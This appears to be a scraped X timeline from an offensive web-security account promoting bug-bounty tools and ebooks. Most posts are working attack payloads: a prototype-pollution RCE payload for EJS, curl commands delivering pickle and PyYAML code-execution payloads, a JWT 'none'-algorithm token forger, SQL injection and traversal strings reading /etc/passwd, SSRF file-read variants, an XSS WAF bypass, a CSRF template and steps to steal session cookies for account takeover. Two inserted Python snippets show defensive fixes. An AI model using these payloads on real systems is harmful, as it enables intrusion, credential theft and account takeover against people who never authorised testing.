Tweets

We are on X

3 Methods, 3 Levels

[ base64 ]
YnJ1dGU=

[ AES ]
RmnVLVQ/x45ZbDfUnOp7hw==

[ bcrypt ]
$2b$12$T2hEfL9HDXzS5kZuqvC1hOdzYOsLZnVjs04Fd4/fPLf/kztfYhhSq

#crackme

Brute One v0.2 with JBroken

Our proprietary tool to handle all the cases of our testbed at https://403.brutelogic.net/authz/jwt

Fully automated with FFF - Find, Forge and Fire PoC

Available at


#hack2earn #bugbounty #jwt

BRute Logic @BRuteLogic

JWT Auth Bypass TestBed

http://403.brutelogic.net/authz/jwt

Test your skills: 18 main tests with variations.

A proprietary tool with 40+ techniques for Brute One will be available this week to spot all these cases in the wild in a matter of seconds.

https://brutelogic.net/brute-one

This Week on BRute Logic

Review Your Recon Skills
https://x.com/BRuteLogic/status/2061456483255190008

New Ebook - Broken Token: JWT
https://x.com/BRuteLogic/status/2061818871074685187

JWT SQL Injection (jti)
https://x.com/BRuteLogic/status/2062181258981970265

Node.js RCE via EJS (<v6.0.0-alpha)
https://x.com/BRuteLogic/status/2062548679983284549

Check our timeline for more.

BRute Logic @BRuteLogic

Node.js RCE via EJS (<v6.0.0-alpha)

Unsafe merge - Prototype Pollution leading to RCE via template rendering.

{"__proto__":{"client":true,"escapeFunction":"function(){return process.mainModule.require('child_process').spawnSync('id').stdout;};//"}}

#node #rce #cfbypass

Broken Token - JWT

New ebook, the first of the series.

Master every way to break JSON Web Tokens:

• Algorithm confusion
• Key injection
• Claim manipulation
• Format attacks

+ Original research

Essential for bug bounty hunters & pentesters.

JWT SQL Injection

jti (JWT ID) is stored in a DB to prevent token replay.
That lookup is injectable.

"jti": "' OR '1'='1"

Try it: http://403.brutelogic.net/authz/jwt/jti

Full technique: http://brutelogic.net/ebooks/broken-token/jwt/

#hack2earn #bugbounty #jwt
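
The lookup described in the post above, shown as a string-built query beside a parameterized one. This is an added example, not code from the post or the testbed; the table name, the 32-hex jti format and the sample values are assumptions made for the illustration.

```python
import re
import sqlite3

# Assumption: this service issues jti values as 32 lowercase hex characters.
JTI_RE = re.compile(r"[0-9a-f]{32}")
KNOWN_JTI = "0" * 31 + "1"  # constructed sample value

def make_db():
    """In-memory table of issued, still-valid token IDs (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE active_jti (jti TEXT PRIMARY KEY)")
    db.execute("INSERT INTO active_jti VALUES (?)", (KNOWN_JTI,))
    return db

def jti_known_concat(db, jti):
    """The 'before': the claim value is spliced into the SQL text."""
    sql = "SELECT 1 FROM active_jti WHERE jti = '" + jti + "'"
    return db.execute(sql).fetchone() is not None

def jti_known_bound(db, jti):
    """The fix: strict type and format check, then a bound parameter."""
    if not isinstance(jti, str) or not JTI_RE.fullmatch(jti):
        return False
    row = db.execute("SELECT 1 FROM active_jti WHERE jti = ?", (jti,)).fetchone()
    return row is not None

if __name__ == "__main__":
    db = make_db()
    # Columns: value, string-built lookup result, bound lookup result.
    for value in (KNOWN_JTI, "f" * 32, "' OR '1'='1"):
        print(repr(value), jti_known_concat(db, value), jti_known_bound(db, value))
```

Claims are request input like any other field: the bound version treats the jti as data, and the format check rejects anything that is not a token ID before the database is touched.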

Review Your Recon Skills

1. Test against reKover's testbed

http://recon.brutelogic.net

2. Add reKover to your arsenal

https://github.com/BruteLogic/reKover

- Reduce the noise, increase the signal.

This Week on Brute Logic

Parsing Confusion - Cloud Pipelines
https://x.com/BRuteLogic/status/2058919768200004047

Path Traversal Bypasses
https://x.com/BRuteLogic/status/2059282155948449811

Leaking httpOnly Cookies for ATO
https://x.com/BRuteLogic/status/2059644544740692421

Python RCE - Pickle & PyYAML
https://x.com/BRuteLogic/status/2060038535575384522

Check our timeline for more.

BRute Logic @BRuteLogic

Python RCE

Pickle
curl TARGET/api -H"Content-Type:application/json" -d'{"data":"gASVKwAAAAAAAACMCnN1YnByb2Nlc3OUjAxjaGVja19vdXRwdXSUk5RdlIwCaWSUYYWUUpQu"}'

PyYAML
curl TARGET/api/config -H"Content-Type:application/x-yaml" -d'!!python/object/new:subprocess.check_output [["id"]]'

Last call, ending this weekend.

KNOXSS - Comprehensive XSS Tool
http://knoxss.pro

Ebooks - First Bounty, SSRF, Bypass
http://brutelogic.net/ebooks

Brute One - Tool Enabled AI Assistant
http://brutelogic.net/brute-one

#BugBounty #PenTesting

POST /api/update HTTP/1.1
Host: http://target.com
Content-Type: application/x-www-form-urlencoded
Content-Type: application/json

{"test": true}

Leaking httpOnly Cookies for ATO

1. Trigger DEBUG errors by adding [] to a parameter name, for example:

?id[]=1

2. Fetch the error page, parse and add the session cookies to the XSS ATO script.

Laravel and C# live samples below (debug enabled).

We provide accurate content on Offensive Cybersecurity for Bug Bounty hunting, Penetration Tests and Vulnerability Assessments.

We schedule our posts for 14:35 GMT.

Turn on notifications on our profile so you don't miss any info that might be useful for your next engagement.

Path Traversal Bypasses

Null Byte Injection
../../../etc/./passwd%00.png

Stripped Dot-Dot-Slash
..././..././..././e../tc..//pas../swd

Multi-Stage Decoding
..%2%35%32F..%2%35%32F..%2%35%32Fetc%2%35%32Fpasswd

Truncation Appending (4096 bytes)
../../../etc/./passwd/././././././

Parsing Confusion - Cloud Pipelines

An AWS API Gateway (policy) and a downstream Node.js Lambda (execution) use different engines.

One layer takes the first value, the other layer takes the second.

Always use TRUE and FALSE at the same time.

/server-status
403 Forbidden

/server%2Dstatus
200 OK

Program: Slack
Year: 2016
Bounty: 2k

#hack2earn

This Week on Brute Logic

PHP Null Byte Trick
https://x.com/BRuteLogic/status/2056395874155078032

Brute One Web Search
https://x.com/BRuteLogic/status/2056411691596837323

SSRF Polyglots
https://x.com/BRuteLogic/status/2056745441182593355

WP CSRF Template
https://x.com/BRuteLogic/status/2057470216821449080

JWT NoAlg Bypass
https://x.com/BRuteLogic/status/2057107828863598594

#BugBounty #PenTesting #WebAppSec

BRute Logic @BRuteLogic

JWT NoAlg Bypass (no sig needed)

Authorization: Bearer eyJhbGciOiJub25lIn0.eyJzdWIiOiJhZG1pbiJ9.

Change the fields accordingly if needed.

echo '{"sub":"admin","role":"admin","admin":true}' | base64 | tr -d '=' | xargs -I{} echo "eyJhbGciOiJub25lIn0.{}."

#BugBounty #BrokenAuth
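
A verifier that refuses the unsigned token from the post above because it pins the algorithm itself instead of reading it from the header. This is an added example, not code from the post; the HS256 choice, the key and the function names are assumptions made for the illustration.

```python
import base64
import hashlib
import hmac
import json

KEY = b"constructed-demo-key"  # assumption: sample secret for this example
NOALG_TOKEN = "eyJhbGciOiJub25lIn0.eyJzdWIiOiJhZG1pbiJ9."  # token from the post

def b64u_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def b64u_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def mac(signing_input, key):
    return hmac.new(key, signing_input.encode(), hashlib.sha256).digest()

def sign_hs256(claims, key=KEY):
    """Issue a token so the example has a legitimate one to compare against."""
    head = b64u_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64u_encode(json.dumps(claims).encode())
    return f"{head}.{body}.{b64u_encode(mac(head + '.' + body, key))}"

def verify_hs256(token, key=KEY):
    """Return the claims or raise ValueError. The verifier pins HS256; the
    header's alg is compared against that, never used to pick the check."""
    parts = token.split(".")
    if len(parts) != 3 or not parts[2]:
        raise ValueError("malformed or unsigned token")
    header = json.loads(b64u_decode(parts[0]))  # decode errors are ValueError
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        raise ValueError("unexpected alg")
    expected = mac(parts[0] + "." + parts[1], key)
    if not hmac.compare_digest(b64u_decode(parts[2]), expected):
        raise ValueError("bad signature")
    return json.loads(b64u_decode(parts[1]))

def accepts(token):
    try:
        verify_hs256(token)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    print(accepts(sign_hs256({"sub": "alice"})), accepts(NOALG_TOKEN))
```

The same rule applies when using a JWT library: pass the expected algorithm list to the verify call explicitly and treat an empty signature segment as a hard failure.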

When they think "the frontend handles that".

WP CSRF Hunting Template

<body onload=forms[0].submit()>
<form action=//TARGET/wp-admin/admin-ajax.php method=post>
<input name=action value=NAME>
<input name=_wpnonce value=any>
<!-- add inputs -->

Directions
1. Grep wp_ajax_ in plugin
2. No check_ajax_referer? Fill NAME, fire

SSRF Payloads for LFR/LFD

file:/etc//passwd%3F/
file:/etc%252Fpasswd/
file:/etc%252Fpasswd%3F/
file:///etc/%3F/../passwd
file:${br}/et${u}c%252Fpas${te}swd%3F/
file:$(br)/et$(u)c%252Fpas$(te)swd%3F/

SSRF POLYGLOT
file:///etc/./passwd?/../passwd

#CF403

Web search with Brute One
http://brutelogic.net/brute-one

PHP Null Byte on Parameter Trick
Use to fool WAFs that decode before parsing.

It might consider the anchor with dangling (but harmless) markup instead of the real vector.

param%00p%3D<A/Href="<Svg/OnLoad=alert(1)//

More on

PoC https://gym.brutelogic.net/?p05%00p%3D%3CA/Href=%22%3CSvg/OnLoad=alert(1)//

This Week on Brute Logic

Brute May - Promo 50% OFF
https://x.com/BRuteLogic/status/2053842316712878219

RCE Payloads - Java, JS and Python
https://x.com/BRuteLogic/status/2054226700423123097

Localhost Obfuscation - BAC, LFD and SSRF
https://x.com/BRuteLogic/status/2054513716876480732

SQLi Polyglot - MySQL
https://x.com/BRuteLogic/status/2055263804745810296

Check our timeline for more.

BRute Logic @BRuteLogic

Spray & Pray

and-1/*'/*"/**/||1--\

#SQLi #MySQL

Sharp and accurate content on offensive cybersecurity (web hacking), bug bounty and AI.

Don't miss anything — check our timeline from time to time or hit the bell to get notified.

Found mobile UI bugs on @Hacker0x01. Reporting now, hope they are responsive.

AI will only replace you if all you do is to run tools.

Brute May - 50% OFF

Coupon Code
BRUTE50

KNOXSS
https://knoxss.pro

Brute One
https://brutelogic.net

Ebooks
https://brutelogic.net/ebooks

Valid until May 31st 2026.
#XSS #SSRF #Bypass #AI #BugBounty
